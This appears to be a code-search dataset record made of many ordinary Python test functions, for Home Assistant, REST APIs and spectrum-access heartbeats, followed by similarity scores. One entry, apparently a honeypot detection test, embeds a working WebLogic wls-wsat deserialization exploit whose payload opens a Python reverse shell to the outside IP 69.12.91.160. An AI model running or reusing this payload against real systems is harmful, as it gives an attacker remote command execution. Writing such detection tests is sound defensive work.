client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 3\n trace = response[\"result\"][\"moon\"][2]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert \"error\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": True}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event2'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]", "def test_called(self, mock_bootstrap, mock_api, mock_match):\n # host/port details returned by bootstrap\n mock_bootstrap.side_effect = [('host', 1234)]\n # short-circuit version checking\n mock_match.side_effect = [True] * 2\n mock_api.version().side_effect = ['1.0.0']\n\n # Check that all four api's created are passed the network details\n with patch('fetchai.ledger.api.TokenApi') as tapi, \\\n patch('fetchai.ledger.api.ContractsApi') as capi, \\\n patch('fetchai.ledger.api.TransactionApi') as txapi, \\\n patch('fetchai.ledger.api.ServerApi') as sapi:\n _ = LedgerApi(network='alpha')\n\n tapi.assert_called_once_with('host', 1234)\n capi.assert_called_once_with('host', 1234)\n txapi.assert_called_once_with('host', 1234)\n sapi.assert_called_once_with('host', 1234)\n\n # Check that bootstrap is queried\n mock_bootstrap.assert_called_once_with('alpha')", "def trigger_service(call):\n event = call.data.get(ATTR_EVENT)\n value1 = call.data.get(ATTR_VALUE1)\n value2 = call.data.get(ATTR_VALUE2)\n value3 = call.data.get(ATTR_VALUE3)\n if event is None:\n return\n\n try:\n import pyfttt as pyfttt\n pyfttt.send_event(key, event, value1, value2, value3)\n except requests.exceptions.RequestException:\n _LOGGER.exception(\"Error communicating with IFTTT\")", "async def test_services(hass, coap_wrapper):\n assert coap_wrapper\n\n hass.async_create_task(\n hass.config_entries.async_forward_entry_setup(coap_wrapper.entry, SWITCH_DOMAIN)\n )\n await hass.async_block_till_done()\n\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_ON,\n {ATTR_ENTITY_ID: \"switch.test_name_channel_1\"},\n blocking=True,\n )\n assert hass.states.get(\"switch.test_name_channel_1\").state == STATE_ON\n\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_OFF,\n {ATTR_ENTITY_ID: \"switch.test_name_channel_1\"},\n blocking=True,\n )\n assert hass.states.get(\"switch.test_name_channel_1\").state == STATE_OFF", "def test_run_add_group():\n gid = 123\n azure = create_azure_mock('GROUP1', [1, 2])\n data = [create_everbridge_contacts([], True)]\n insert_ids = [1, 2]\n insert_data = create_everbridge_contacts(insert_ids, False)\n inserted_data = [create_everbridge_contacts(insert_ids, True)]\n inserted_exids = ('&[email protected]&[email protected]')\n ever = create_everbridge_mock(data)\n ever.add_group = MagicMock(return_value={'id': 123})\n ever.get_group_id_by_name = MagicMock(return_value=None)\n ever.get_contacts_by_external_ids = MagicMock(side_effect=inserted_data)\n app = 
Synchronizer(azure, ever)\n # Call run\n rslt = app.run([gid])\n # Tests each method call\n azure.get_group_name.assert_called_with(gid)\n ever.get_group_id_by_name.assert_called_with('GROUP1')\n ever.add_group.assert_called_with('GROUP1', None)\n ever.delete_group.assert_not_called()\n ever.delete_members_from_group.assert_not_called()\n ever.delete_contacts.assert_not_called()\n ever.upsert_contacts.assert_called_with(insert_data)\n ever.get_contacts_by_external_ids.assert_called_with(inserted_exids)\n ever.add_members_to_group.assert_called_with(gid, insert_ids)\n assert rslt == {\n 'GROUP1': {\n 'azure_group_id': 123, 'everbridge_group_id': 123,\n 'azure_count': 2, 'everbridge_count': 0, 'error_contacts': 0,\n 'inserted_contacts': 2, 'updated_contacts': 0, 'removed_members': 0,\n 'deleted_contacts': 0, 'added_members': 2}\n }", "def run(self):\r\n logging.info(\"Now excecuting test step {}\".format(self.stepname))\r\n try:\r\n response = eval(\"requests.{}('{}',params={})\".format(self.verb, self.url, self.payload))\r\n return response, True\r\n\r\n except requests.exceptions.RequestException as e:\r\n logging.warn(\"test {} failed\".format(self.stepname))\r\n \r\n return None, False", "def test_create_startliste(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n with open(\"tests/files/G11KvartStart.json\") as json_file:\n data = json.load(json_file)\n\n headers = {\"content-type\": \"application/json; charset=utf-8\"}\n response = requests.post(url, headers=headers, json=data)\n assert response.status_code == 201", "def run(self,base_url):\n\n url = base_url + self.endpoint\n\n if self.method.upper() == \"GET\":\n r = requests.get(url)\n\n elif self.method.upper() == \"POST\":\n\n if self.payload is not None:\n r = requests.post(url, json=self.payload)\n else:\n r = requests.post(url)\n\n else:\n msg = \"Malformed test. Allowed methods are GET and POST\"\n return get_failure_object(msg)\n\n try:\n\n resp = r.json()\n\n except ValueError as e:\n\n msg = \"Could not decode JSON from response.\"\n return get_failure_object(msg)\n\n try:\n\n # Run all checks for expected exact JSON response values\n for check_key in self.expected_values:\n\n exp_val = self.expected_values[check_key]\n\n if exp_val != resp[check_key]:\n\n msg = \"Expected value '%s' at key '%s' but got '%s'.\" \\\n % (str(exp_val), str(check_key), str(resp[check_key]))\n\n return get_failure_object(msg)\n\n # Run all checks for expected types in JSON response\n for check_key in self.expected_types:\n\n exp_type = self.expected_types[check_key]\n val = resp[check_key]\n\n if exp_type == \"string\":\n type_res = test_expected_type(val, str)\n\n elif exp_type == \"int\":\n type_res = test_expected_type(val, int)\n\n elif exp_type == \"float\":\n type_res = test_expected_type(val, float)\n\n else:\n msg = \"Malformed test. 
Expected types allowed: 'str',\\\n 'int', 'float'\"\n return {\"status\": \"FAILED\", \"error_msg\": msg}\n\n if type_res == False:\n msg = get_expected_type_error_message(check_key, val, exp_type)\n return get_failure_object(msg)\n\n return {\"status\":\"PASSED\"}\n\n except KeyError as e:\n msg = \"Expected key '%s' not found.\" % str(e.args[0])\n return get_failure_object(msg)", "def test_run(self, mock):\n mock.return_value = mock_trello_service()\n\n pull_requests = PullRequest.query.all()\n self.assertTrue(len(pull_requests) is 0)\n\n payload = json_fixture('./tests/fixtures/pull_request_opened.json')\n CreatePullRequestCard.delay(\n board_id=default_board_id,\n list_id=default_list_id,\n name='Fake Pull Request',\n payload=payload\n )\n\n # Enqueuing new pull_request `CreatePullRequestCard` should create a\n # `PullRequest` record\n new_pull_requests = PullRequest.query.all()\n self.assertTrue(len(new_pull_requests) is 1)", "def test_fax_inbound_automation_post(self):\n pass", "def test_call_log(self):\n\n bt_contacts_utils.add_call_log(\n self.pse, bt_contacts_utils.INCOMMING_CALL_TYPE,\n bt_contacts_utils.generate_random_phone_number().phone_number,\n int(time.time() * 1000))\n bt_contacts_utils.add_call_log(\n self.pse, bt_contacts_utils.INCOMMING_CALL_TYPE,\n bt_contacts_utils.generate_random_phone_number().phone_number,\n int(time.time()) * 1000 - 4 * CALL_LOG_TIME_OFFSET_IN_MSEC)\n bt_contacts_utils.add_call_log(\n self.pse, bt_contacts_utils.OUTGOING_CALL_TYPE,\n bt_contacts_utils.generate_random_phone_number().phone_number,\n int(time.time()) * 1000 - CALL_LOG_TIME_OFFSET_IN_MSEC)\n bt_contacts_utils.add_call_log(\n self.pse, bt_contacts_utils.MISSED_CALL_TYPE,\n bt_contacts_utils.generate_random_phone_number().phone_number,\n int(time.time()) * 1000 - 2 * CALL_LOG_TIME_OFFSET_IN_MSEC)\n bt_contacts_utils.add_call_log(\n self.pse, bt_contacts_utils.MISSED_CALL_TYPE,\n bt_contacts_utils.generate_random_phone_number().phone_number,\n int(time.time()) * 1000 - 2 * CALL_LOG_TIME_OFFSET_IN_MSEC)\n\n self.pce.droid.bluetoothPbapClientDisconnect(\n self.pse.droid.bluetoothGetLocalAddress())\n self.pce.droid.bluetoothPbapClientDisconnect(\n self.pse2.droid.bluetoothGetLocalAddress())\n\n bt_test_utils.connect_pri_to_sec(\n self.pce, self.pse,\n set([BtEnum.BluetoothProfile.PBAP_CLIENT.value]))\n pse_call_log_count = self.pse.droid.callLogGetCount()\n self.log.info(\"Waiting for {} call logs to be transfered\".format(\n pse_call_log_count))\n bt_contacts_utils.wait_for_call_log_update_complete(self.pce,\n pse_call_log_count)\n\n if not bt_contacts_utils.get_and_compare_call_logs(\n self.pse, self.pce, bt_contacts_utils.INCOMMING_CALL_TYPE):\n return False\n if not bt_contacts_utils.get_and_compare_call_logs(\n self.pse, self.pce, bt_contacts_utils.OUTGOING_CALL_TYPE):\n return False\n if not bt_contacts_utils.get_and_compare_call_logs(\n self.pse, self.pce, bt_contacts_utils.MISSED_CALL_TYPE):\n return False\n\n return True", "def setUp(self):\n self.hass = get_test_home_assistant()\n mock_component(self.hass, 'group')\n assert setup_component(self.hass, zone.DOMAIN, {\n 'zone': {\n 'name': 'test',\n 'latitude': 32.880837,\n 'longitude': -117.237561,\n 'radius': 250,\n }\n })\n\n self.calls = []\n\n @callback\n def record_call(service):\n \"\"\"Record calls.\"\"\"\n self.calls.append(service)\n\n self.hass.services.register('test', 'automation', record_call)", "def post(self):\n data = api.payload\n\n try:\n phone_call = PhoneCallStart(\n parser.parse(data[\"start_timestamp\"]),\n 
data[\"call_id\"],\n data[\"source\"],\n data[\"destination\"]\n )\n except AssertionError as error:\n return error.args, 400\n\n repository.db.session.add(phone_call)\n repository.db.session.commit()\n\n return phone_call, 201", "def test_start(self):\n\n message = {\"method\": \"start\",\n \"params\": {\"elem\": self.container_to_run}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"start\")\n self.assertIsInstance(response[\"result\"], list)\n\n container_name = \"/\" + self.container_to_run\n\n containers = {i[0]: i[1] for i in response[\"result\"]}\n self.assertIn(container_name, containers.keys(),\n \"Container not found\")\n\n find_up_status = containers[container_name].lower().find(\"up\")\n\n self.assertEqual(find_up_status, 0, \"Container is not running\")", "def test_micro_service():\n data_list = [\"1\", \"2\", \"3\"]\n service_list = []\n for d in data_list:\n service = MicroService()\n service.process = create_process_func(d)\n service_list.append(service)\n\n service_queue = build_micro_service_queue(service_list)\n test_data = \"test_data\"\n context = Context()\n context.state = State()\n data = service_queue.process_service_queue(context, test_data)\n\n for d in data_list:\n test_data = \"{}{}\".format(test_data, d)\n\n assert data == test_data", "async def test_api_fire_event_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(event):\n \"\"\"Record that our event got called.\n\n Also test if our data came through.\n \"\"\"\n if \"test\" in event.data:\n test_value.append(1)\n\n hass.bus.async_listen_once(\"test_event_with_data\", listener)\n\n await mock_api_client.post(\"/api/events/test_event_with_data\", json={\"test\": 1})\n\n await hass.async_block_till_done()\n\n assert len(test_value) == 1", "def test_get_requests(self):\n response = self.client.open('/api/provisioning/port',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_run_started(self):", "def test_services(self):\n\n # Test turn_on\n turn_on_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_ON)\n\n remote.turn_on(\n self.hass,\n entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_on_calls))\n call = turn_on_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n\n # Test turn_off\n turn_off_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_OFF)\n\n remote.turn_off(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_off_calls))\n call = turn_off_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_TURN_OFF, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test sync\n sync_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SYNC)\n\n remote.sync(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(sync_calls))\n call = sync_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SYNC, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test send_command\n send_command_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SEND_COMMAND)\n\n remote.send_command(\n self.hass, entity_id='entity_id_val',\n device='test_device', command='test_command')\n\n self.hass.block_till_done()\n\n 
self.assertEqual(1, len(send_command_calls))\n call = send_command_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SEND_COMMAND, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])", "def setUp(self):\n self.staff = get_user_model().objects.create_user(\n email='[email protected]',\n password='staffpassword1234',\n username='staffusername'\n )\n self.staff.is_staff = True\n self.staff.save()\n self.staff.refresh_from_db()\n\n self.client = APIClient()\n self.client.force_authenticate(user=self.staff)\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.id],\n 'overview': '<strong>Bla</strong> bla bla',\n }\n\n \"\"\"Test that list procedure is success\"\"\"\n p1 = models.Procedure.objects.create(\n name=\"procedure1\",\n overview='bla bla bla'\n )\n p1.speciality.set([self.speciality.pk])\n p1.save()\n\n p2 = models.Procedure.objects.create(\n name=\"procedure2\",\n overview='bla bla bla'\n )\n p2.speciality.set([self.speciality.pk])\n p2.save()\n\n res = self.client.get(PROCEDURE_URL)\n\n procedures = models.Procedure.objects.all().order_by(\"-name\")\n ser = serializer.ProcedureSerializer(procedures, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 2)\n self.assertEqual(res.data, ser.data)", "def setUp(self):\n self.client = APIClient()\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.pk],\n 'days_in_hospital': 2,\n 'days_in_destination': 2,\n 'duration_minutes': 120,\n 'overview': '<strong>Bla</strong> bla bla',\n }", "async def test_get_dispatch_route_by_id(client):\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes/{route_id}'.format(route_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_get_one_flow_requests_as_super_client(self):\n headers = self._get_oauth_header(client_name=DISPATCHER_NAME)\n res = self.client.get('/v1/flow_requests/p_11111/', **headers)\n self.assertEqual(res.status_code, 200)\n profile = {\n 'code': 'PROF_001',\n 'version': 'v0',\n 'payload': '[{\"clinical_domain\": \"Laboratory\"}]'\n }\n expected = {\n 'flow_id': 'f_11111',\n 'process_id': 'p_11111',\n 'status': 'PE',\n 'profile': profile,\n 'sources': [{\n 'source_id': SOURCE_1_ID,\n 'name': SOURCE_1_NAME,\n 'profile': profile\n }],\n 'start_validity': '2017-10-23T10:00:00+02:00',\n 'expire_validity': '2018-10-23T10:00:00+02:00'\n }\n self.assertDictEqual(res.json(), expected)", "def test(self):\n exploit = \"\"\"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>/bin/sh</string>\n </void>\n <void index=\"1\">\n <string>-c</string>\n </void>\n <void index=\"2\">\n <string>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.c\"\"\" \\\n \"\"\"onnect((\"69.12.91.160\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=\"\"\" \\\n \"\"\"subprocess.call([\"/bin/sh\",\"-i\"]);'</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\"\"\"\n requests.post(\"http://127.0.0.1:{}/wls-wsat/CoordinatorPortType\".format(WEBLOGIC_PORT), data=exploit)\n\n return [WEBLOGIC_ALERT_TYPE_NAME]", "async def test_service_refresh_devices(\n hass: HomeAssistant, aioclient_mock: AiohttpClientMocker\n) -> None:\n config_entry = await setup_deconz_integration(hass, aioclient_mock)\n\n assert len(hass.states.async_all()) == 0\n\n aioclient_mock.clear_requests()\n\n data = {\n \"config\": {},\n \"groups\": {\n \"1\": {\n \"id\": \"Group 1 id\",\n \"name\": \"Group 1 name\",\n \"type\": \"LightGroup\",\n \"state\": {},\n \"action\": {},\n \"scenes\": [{\"id\": \"1\", \"name\": \"Scene 1\"}],\n \"lights\": [\"1\"],\n }\n },\n \"lights\": {\n \"1\": {\n \"name\": \"Light 1 name\",\n \"state\": {\"reachable\": True},\n \"type\": \"Light\",\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n \"sensors\": {\n \"1\": {\n \"name\": \"Sensor 1 name\",\n \"type\": \"ZHALightLevel\",\n \"state\": {\"lightlevel\": 30000, \"dark\": False},\n \"config\": {\"reachable\": True},\n \"uniqueid\": \"00:00:00:00:00:00:00:02-00\",\n }\n },\n }\n\n mock_deconz_request(aioclient_mock, config_entry.data, data)\n\n await hass.services.async_call(\n DECONZ_DOMAIN, SERVICE_DEVICE_REFRESH, service_data={CONF_BRIDGE_ID: BRIDGEID}\n )\n await hass.async_block_till_done()\n\n assert len(hass.states.async_all()) == 5", "def test_restart(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertTrue(rpc.restart())\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call()],\n self.supervisor.supvisors.fsm.on_restart.call_args_list)", "def test_start_machine(self, pretty_print, owner_api_token):\n machine = setup_data.get('start_machine', {}).get('machine') \\\n or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + \\\n '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'stop': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "def test_collection_controller_run_countdown_calls(setup_controller, mock_run):\n # given\n sources = {\n 'kraken': KrakenOHLCV(Interval.MINUTE, SymbolPair(Symbol.BITCOIN, Symbol.USD), 719),\n 'crypto_compare': CryptoCompareOHLCV(Interval.MINUTE, SymbolPair(Symbol.BITCOIN, Symbol.USD), 2000),\n }\n controller = setup_controller(sources, 2, 120)\n mock_run(sources)\n # when\n controller.run()\n # then\n expected = [call(1560123060.0), call(1560123180.0), call(1560144630.0), call(1560183180.0)]\n assert utils.time.countdown.call_args_list == expected", "def start():\n\n config = os.path.join(tempfile.gettempdir(), \"testapi.yml\")\n\n with open(config, \"w\", encoding=\"utf-8\") as output:\n output.write(WORKFLOWS)\n\n client = TestClient(app)\n start()\n\n return client", "def mock_default_vapix_requests(respx: respx, host: str = DEFAULT_HOST) -> 
None:\n respx.post(f\"http://{host}:80/axis-cgi/apidiscovery.cgi\").respond(\n json=API_DISCOVERY_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/basicdeviceinfo.cgi\").respond(\n json=BASIC_DEVICE_INFO_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/io/portmanagement.cgi\").respond(\n json=PORT_MANAGEMENT_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/lightcontrol.cgi\").respond(\n json=LIGHT_CONTROL_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/mqtt/client.cgi\").respond(\n json=MQTT_CLIENT_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/streamprofile.cgi\").respond(\n json=STREAM_PROFILES_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/viewarea/info.cgi\").respond(\n json=VIEW_AREAS_RESPONSE\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Brand\"\n ).respond(\n text=BRAND_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Image\"\n ).respond(\n text=IMAGE_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Input\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.IOPort\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Output\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Properties\"\n ).respond(\n text=PROPERTIES_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.PTZ\"\n ).respond(\n text=PTZ_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.StreamProfile\"\n ).respond(\n text=STREAM_PROFILES_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.post(f\"http://{host}:80/axis-cgi/applications/list.cgi\").respond(\n text=APPLICATIONS_LIST_RESPONSE,\n headers={\"Content-Type\": \"text/xml\"},\n )\n respx.post(f\"http://{host}:80/local/vmd/control.cgi\").respond(json=VMD4_RESPONSE)", "def test_10_9_4_2_3_1_3(self):\n\n # Register the device\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n self._sas_admin.InjectFccId({'fccId': device_a['fccId']})\n request = {'registrationRequest': [device_a]}\n response = self._sas.Registration(request)['registrationResponse'][0]\n # Check registration response\n self.assertEqual(response['response']['responseCode'], 0)\n cbsd_id = response['cbsdId']\n del request, response\n\n # Request grant\n grant_0 = json.load(\n open(os.path.join('testcases', 'testdata', 'grant_0.json')))\n grant_0['cbsdId'] = cbsd_id\n request = {'grantRequest': [grant_0]}\n # Check grant response\n response = self._sas.Grant(request)['grantResponse'][0]\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertTrue(response['grantId'])\n self.assertEqual(response['response']['responseCode'], 0)\n grant_id = response['grantId']\n del request, response\n\n # First successful Heartbeat\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id,\n 'operationState': 'GRANTED'\n }]\n }\n response = 
self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertEqual(response['grantId'], grant_id)\n self.assertLess(datetime.utcnow(),\n datetime.strptime(response['transmitExpireTime'],\n '%Y-%m-%dT%H:%M:%SZ'))\n self.assertEqual(response['response']['responseCode'], 0)\n del request, response\n\n # operationState is missing\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['response']['responseCode'], 102)", "def test_batch(self):\n req = '''[{\"foo\": \"boo\"},\n {\"jsonrpc\": \"2.0\", \"method\": \"notify_hello\", \"params\": [7]},\n {\"jsonrpc\": \"2.0\", \"method\": \"subtract\", \"params\": [42,23], \"id\": \"2\"},\n {\"jsonrpc\": \"2.0\", \"method\": \"foo.get\", \"params\": {\"name\": \"myself\"}, \"id\": \"5\"}\n ]'''\n\n resp = '''[{\"jsonrpc\": \"2.0\", \"error\": {\"code\": -32600, \"message\": \"InvalidRequestError: Invalid members in request object\"}, \"id\": null},\n {\"jsonrpc\": \"2.0\", \"result\": 19, \"id\": \"2\"},\n {\"jsonrpc\": \"2.0\", \"id\": \"5\", \"error\": {\"message\": \"MethodNotFoundError: Method foo.get not found\", \"code\": -32601}}\n ]'''\n\n status = 200\n r_status, r_resp = self.exec_handler(req)\n self.assertEqual(r_status, status)\n self.assertEqual(simplejson.loads(r_resp), simplejson.loads(resp))", "def program_start_stop_response_fixture() -> dict[str, Any]:\n return cast(\n dict[str, Any], json.loads(load_fixture(\"program_start_stop_response.json\"))\n )", "def test_10_9_4_1_1_1(self):\n\n # Register the device\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n self._sas_admin.InjectFccId({'fccId': device_a['fccId']})\n request = {'registrationRequest': [device_a]}\n response = self._sas.Registration(request)['registrationResponse'][0]\n # Check registration response\n self.assertEqual(response['response']['responseCode'], 0)\n cbsd_id = response['cbsdId']\n del request, response\n\n # Request grant\n grant_0 = json.load(\n open(os.path.join('testcases', 'testdata', 'grant_0.json')))\n grant_0['cbsdId'] = cbsd_id\n request = {'grantRequest': [grant_0]}\n # Check grant response\n response = self._sas.Grant(request)['grantResponse'][0]\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertTrue(response['grantId'])\n self.assertEqual(response['response']['responseCode'], 0)\n grant_id = response['grantId']\n del request, response\n\n # Heartbeat\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id,\n 'operationState': 'GRANTED'\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertEqual(response['grantId'], grant_id)\n self.assertLess(datetime.utcnow(),\n datetime.strptime(response['transmitExpireTime'],\n '%Y-%m-%dT%H:%M:%SZ'))\n self.assertEqual(response['response']['responseCode'], 0)" ]
[ "0.8484062", "0.75393564", "0.7322953", "0.722341", "0.6426046", "0.62504566", "0.6230039", "0.6164438", "0.59421086", "0.59283173", "0.5919254", "0.58633626", "0.58341634", "0.58131343", "0.5774062", "0.57502663", "0.56712496", "0.5646838", "0.56402326", "0.5634627", "0.56305146", "0.55820596", "0.5575428", "0.55573285", "0.5527161", "0.5521873", "0.55182016", "0.5496908", "0.54858696", "0.5474771", "0.5471524", "0.5465941", "0.54440826", "0.5443692", "0.54396427", "0.54267955", "0.5416645", "0.5397404", "0.5391385", "0.5390922", "0.53898174", "0.5389428", "0.5387801", "0.5384789", "0.5383504", "0.53803694", "0.5371299", "0.5357171", "0.5355477", "0.53491074", "0.5346791", "0.53402585", "0.5334859", "0.533314", "0.5331193", "0.5326101", "0.53120124", "0.5310904", "0.53057235", "0.53043985", "0.5294298", "0.5290404", "0.528842", "0.5285166", "0.5280448", "0.52729034", "0.527209", "0.52621377", "0.52594733", "0.5248786", "0.52476406", "0.5244737", "0.5243314", "0.5242774", "0.5240708", "0.52405614", "0.52372336", "0.5236698", "0.5234035", "0.5230023", "0.5215871", "0.52148145", "0.5211928", "0.5210353", "0.5208954", "0.51945716", "0.519444", "0.51904166", "0.5188891", "0.51869977", "0.51841", "0.5181114", "0.517983", "0.51785386", "0.5177475", "0.5166816", "0.5163055", "0.5156724", "0.5155637", "0.51539403" ]
0.8285663
1
Test POSTing two start registries and only one stop registry and expect to GET only one record on the Call API endpoint. Test uses start_call_fx fixture. Test uses stop_call_fx fixture.
def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):
    post_url = reverse_lazy('calls:registry-list')
    start_call_fx_2 = copy(start_call_fx)
    start_call_fx_2['call_id'] = 2
    post_data = [start_call_fx, start_call_fx_2, stop_call_fx]
    for data in post_data:
        response = client.post(post_url, data, content_type='application/json')
        assert response.status_code == status.HTTP_201_CREATED
    get_url = reverse_lazy('calls:call-list')
    response = client.get(get_url)
    assert len(response.data) == 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n 